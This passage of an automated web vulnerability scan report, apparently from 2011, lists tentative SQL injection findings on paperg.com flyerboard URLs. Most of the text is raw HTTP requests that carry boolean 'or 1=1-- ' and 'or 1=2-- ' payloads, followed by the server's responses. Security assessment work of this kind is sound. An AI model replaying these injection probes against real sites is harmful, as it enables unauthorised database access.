           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
   
...[SNIP]...

Request 2

GET /flyerboard/conifer-park/175314633334%20or%201%3d2--%20/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.11. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/electrical-sub-code/3474/44819.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16105332%20or%201%3d1--%20 and 16105332%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/electrical-sub-code/347416105332%20or%201%3d1--%20/44819.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5454
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - ELECTRICAL SUB-CODE - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "ELECTRICAL SUB-CODE" />
   
   <meta name="description" content = "The Township of Montclair is seeking a self-motivated individual to fill the position of Electrical Sub code Official in the Uniform Construction Division of..." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/16602/0montclair130444957544819.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id=
...[SNIP]...

Request 2

GET /flyerboard/electrical-sub-code/347416105332%20or%201%3d2--%20/44819.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.12. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/helderberg-mountain/1552/43055.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19975086%20or%201%3d1--%20 and 19975086%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/helderberg-mountain/155219975086%20or%201%3d1--%20/43055.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3918
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Helderberg Mountain - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Helderberg Mountain" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/20179/0altfair_h130339534443055.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></
...[SNIP]...

Request 2

GET /flyerboard/helderberg-mountain/155219975086%20or%201%3d2--%20/43055.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.13. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/mount--loretto/1753/45967.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 55958003%20or%201%3d1--%20 and 55958003%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/mount--loretto/175355958003%20or%201%3d1--%20/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3889
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Mount Loretto - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Mount Loretto" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/6730/3mt130513280445967.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       
...[SNIP]...

Request 2

GET /flyerboard/mount--loretto/175355958003%20or%201%3d2--%20/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.14. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/mount-loretto/1552/45967.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 86302656%20or%201%3d1--%20 and 86302656%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/mount-loretto/155286302656%20or%201%3d1--%20/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3889
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Mount Loretto - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Mount Loretto" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/6730/3mt130513280445967.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       
...[SNIP]...

Request 2

GET /flyerboard/mount-loretto/155286302656%20or%201%3d2--%20/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.15. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/northwoods-health/1552/45935.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19317804%20or%201%3d1--%20 and 19317804%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/northwoods-health/155219317804%20or%201%3d1--%20/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3900
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Northwoods Health - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Northwoods Health" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4068/0051211pat130512580345935.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
   
...[SNIP]...

Request 2

GET /flyerboard/northwoods-health/155219317804%20or%201%3d2--%20/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.16. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/northwoods-health/1753/45935.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14620622%20or%201%3d1--%20 and 14620622%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/northwoods-health/175314620622%20or%201%3d1--%20/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3900
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Northwoods Health - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Northwoods Health" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4068/0051211pat130512580345935.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
   
...[SNIP]...

Request 2

GET /flyerboard/northwoods-health/175314620622%20or%201%3d2--%20/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.17. http://www.paperg.com/flyerboard/nyprig/1552/45945.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/nyprig/1552/45945.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 69076538%20or%201%3d1--%20 and 69076538%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/nyprig/155269076538%20or%201%3d1--%20/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3853
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NYPRIG - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "NYPRIG" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/20716/1050811nyp130512849245945.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- END
...[SNIP]...

Request 2

GET /flyerboard/nyprig/155269076538%20or%201%3d2--%20/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
